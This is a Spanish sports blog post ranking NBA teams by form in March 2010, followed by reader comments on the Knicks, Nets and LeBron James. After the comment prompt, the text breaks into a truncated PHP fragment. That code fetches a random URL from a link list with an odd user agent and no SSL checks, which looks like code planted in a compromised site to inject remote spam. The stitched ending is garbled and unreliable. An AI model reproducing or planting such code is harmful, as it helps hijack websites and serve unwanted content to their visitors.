Informe Semanal #15

08 de March de 2010 por TheDeerHunter

Ya ha llovido desde nuestro último informe semanal pero hemos tratado de rellenar el hueco con nuestras revisiones a los pronósticos, artículos que iban en esa misma dirección. Durante este tiempo hemos reflexionado un poco sobre la idoneidad de mantener el actual formato de informes. Al final nuestra conclusión, teniendo muy presente los comentarios del respetable, es que quizás no tiene tanto sentido informativo la periodicidad semanal para el esfuerzo que nos costaba confeccionarlo. Por este motivo os anticipamos que a partir de ahora relajaremos la frecuencia mínimamente. Seguramente ni lo notaréis.

¿Porqué todos los jugones sonríen igual?

El equipo más en forma de la liga ha pasado a ser los remodelados Dallas Mavericks. Todas las virtudes y algunas más de las que venían disfrutando durante su buen comienzo de curso junto con muchos menos defectos. Desde que tocaron la tecla su balance es incontestable y acumulan una racha de 11 victorias seguidas. Será difícil que la interrumpan durante los próximos partidos: Wolves, Nets, Knicks y Bulls por ese orden.

Otros que salieron muy reforzados del “trade line” fueron curiosamente los Bucks. Digo curiosamente porque su mejor momento ha venido a coincidir con el rookie wall de Jennings, y porque a priori tampoco anticipábamos que el traspaso era tan beneficioso para ellos. El caso es que acumulan un 90% de victorias durante los últimos 10 partidos y se consolidan en la zona cómoda de la carrera para playoffs del Este. Quizás sea esta su cota máxima, eso sí.

Ni Orlando ni Phoenix se han destapado con fichajes este invierno. Desde el parón ambos han encontrado su punto de juego, habiendo dado carpetazo a ciertos rumores algo desagradables. Dos duros huesos.

Ganarás el pan con el sudor de tu frente

A los Celtics ya los habíamos dado por muertos y enterrados. Craso error. Desde que se les había dado por acabados han reaccionado con poderío, recuperando un balance cercano al 70% de victorias que es mucho para una banda de acabados. Un mejor reparto de minutos con la consecuente mejora de prestaciones por parte de la vieja guardia del Big Three. El fichaje de Finley nos parece todo un acierto.

En el Este sorprende que Cleveland sólo acumule un 6-4 de los últimos 10 cuando daban sensaciones de un balance mucho mejor. Tanto da, son líderes sobradísimos de la liga. Miami recupera algunas sensaciones de la mano de un Wade en modo MVP (aunque tardío) y los Hawks parecen conformarse con la 4ª plaza.

Volviendo al Oeste: Nuggets, Jazz, Thunder y Spurs han puesto velocidad de crucero. Volvemos al Wild Wild West. Por su parte, los Blazers resisten el ritmo en la cola de playoffs, al menos de momento.

Malos tiempos para la lírica

Los Lakers son el peor equipo de playoffs del Oeste durante este último tramo. A duras penas mantienen el 50% y acumulan 3 derrotas consecutivas que no recordaban ni el más viejo del lugar teniendo a Phil Jackson al mando de la nave. Jugaron muy bien cuando Kobe descansó y en mi opinión la lectura de todo esto no la ha hecho bien el astro angelino. Para ejemplo ilustrativo el partido de anoche contra Orlando. Howard y Carter se mantuvieron en 5 faltas durante buena parte del último cuarto. Nadie pudo forzarles la 6ª porque todo se lo jugó Kobe. Ambos resultaron fundamentales para amarrar la victoria. De haber estado ellos mirando el final desde el banquillo posiblemente no hubiera hecho falta tanta canasta imposible para remontar.

Los Grizzlies sufren para mantener sus opciones pero no lograr reducir distancias con los Blazers. Rockets o Hornets cada vez lo tienen más difícil.

En el Este, Bulls y Bobcats se jugarán la plaza. Ninguno de los dos está mostrando la regularidad necesaria.

Se dejaban llevar

Es momento de maquillar balances, para algunos equipos que ya poco tienen que hacer en este curso.

Los Nets han logrado casi la mitad de sus victorias de la temporada en estos últimos 10 partidos. Con todo mantienen su bochornoso 11,3% que les haría marcar hitos históricos de incapacidad. Eso sí… si mantienen o mejoran este ritmo (que tampoco sería imposible) igual logran evitarlo.

Sixers, Wizards, Pistons y Clippers son los otros equipos “maquillaje”. Se agradece, al menos, que no se dediquen abiertamente a “dejarse ganar” para posicionarse buscando a John Wall.

El carabasas club

Dos equipos especialmente lamentables. Los Wolves… que han tenido mucha suerte de no estar ahora mismo como los Nets (aunque todavía están a tiempo) y los Knicks, que ya tiene mérito empeorar lo que venían haciendo con la incorporación de T-Mac y Sergio.

Kings, Warriors y Pacers a lo suyo. La palabra competitividad en estos casos es casi tabú.

Comenta

12 comentarios a esta entrada

  1. Marco dice:
    #1

    Te has dejado a los Raptors

      Citar

  2. Love Denise dice:
    #2

    Cada día que pasa me convencen más estos Mavs.
    Vaya banda que son estos Knicks, y en mi opinión, me parece que David Lee es un buen jugador, pero no un auténtico crack como sus numeros aparentan, creo que sus estadísticas se ven fuertemente infladas y engordadas debido a que juega en esta banda, algunas canastas que anota, las mete cuando van perdiendo de 20 a 5min del final, y el rival ya pasa de defender, por no hablar de su pésima defensa. En Definitiva, es un buen jugador con muy buena mano, pero en un equipo más serio haría menos daño, y personalmente yo no le firmaría 10 o más millones de $ al año.
    Claro que sí la vara de medir es el salario de Varejao………

      Citar

  3. Txusma dice:
    #3

    En teoria este año era importante para los Knicks para demostrar a Lebron, Bosh, Wade, etc… que habia proyecto en la Gran Manzana. Parece claro que q el objetivo no lo han cumplido. Si no fuera pq el impacto economico de Lebron en NY seria brutal, apostaria a q se queden sobrepagando a un Joe Johnson o similar.

      Citar

  4. portu dice:
    #4

    Para NY no era tan importante dar un buen nivel como aligerar espacio salarial. Además, supuestamente debrían haber dejado el mejor campo posible para q destacasen sus jóvenes… Gallinari ha cumplido, W. Chandler se ha estancada y D. Lee ha estado a muy bien nivel, pero el nivel general creo q ha sido más bajo de lo esperado e incluso traspasaron a su rookie si casi darle minutos siendo un pick muy alto. Sigo creyendo q puede haber sorpresa con Lebron, sobretodo si gana el anillo este año con Cleveland, sería un reto formidable hacerlo con un solar de equipo como NY… y por lo menos a Joe Johnson, Amare o Bosh seguro q pueden aspirar.

      Citar

  5. CAMPO2 dice:
    #5

    Hablais del solar de los Knicks, pero el de los Nets? solo es salvable Harris y Lopez, creeis que con eso alguna estrella querra ir a jugar con ellos con el balance tan pesimo con el que acabaran? o tendran que acabar fichando supuestas estrellas sobrevaloradas que cobraran millonadas?

      Citar

  6. Love Denise dice:
    #6

    aparte de harris y lopez, tambien me parece un muy buen jugador con futuro Courtney Lee, creo que tiene un nivel NBA bastante aceptable, y Douglas-Roberts también es un buen suplente para un equipo, con estos 4, un nº alto de draft y si consiguen un par de agentes libres podrían ir sentando las bases para ir haciendo poco a poco un equipo atractivo y sólido a medio plazo. A ello, sumale que en un par de años se marchan a Brooklyn, con el valor añadido que ello supone el jugar en New York.

      Citar

  7. CAMPO2 dice:
    #7

    el numero alto del draft seguro, ahora a esperar a quien convencen de una manera o de otra, espero que no sea un Reed o Ginobili que ya han dado lo mejor de si y lo Brooklyn ya llevan años dandole vueltas y de una meanera u otra siempre sale alguna excusa que retrasa el traslado un par de años, parece como en donde yo vivo que me llevan diciendo que tendremos campo de futbol de hierva artificial el año que viene desde hace 7 años

      Citar

  8. CAMPO2 dice:
    #8

    hierba perdon

      Citar

  9. Txusma dice:
    #9

    Yo tb veo más atractivo el proyecto de los Nets a nivel deportivo que el de los Knicks ahora mismo. En New Jersey puedes tener 4 jugadores válidos y con futuro y que ademas no se pisan con Lebron y Bosh, por ejemplo (Harris, Lee, Lebron, Bosh, Lopez me parece un quinteto más fuerte que el de los actuales Cavs).

      Citar

  10. sayim dice:
    #10

    Ese quinteto podría ser el mejor de la liga y a poco que se aplicaran todos en defensa (no sería el fuerte de este equipo…) y que tuvieran un banquillo medio decente desde luego favoritos al anillo

      Citar

  11. Love Denise dice:
    #11

    Ese quinteto suena bastante bien, aunque si Lebron sólo piensa en aspectos deportivos, lo más logico es que se quedara en Cleveland.

      Citar

  12. Viva_Dirk dice:
    #12

    Yo no veo a un base como Harris muy compatible con LeBron, como ha dicho Pippen con Rose. Mo Williams, West o Gibson son ejemplos claros de lo que quiere King James en la posición de base, y como escolta cosas similares que defiendan bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>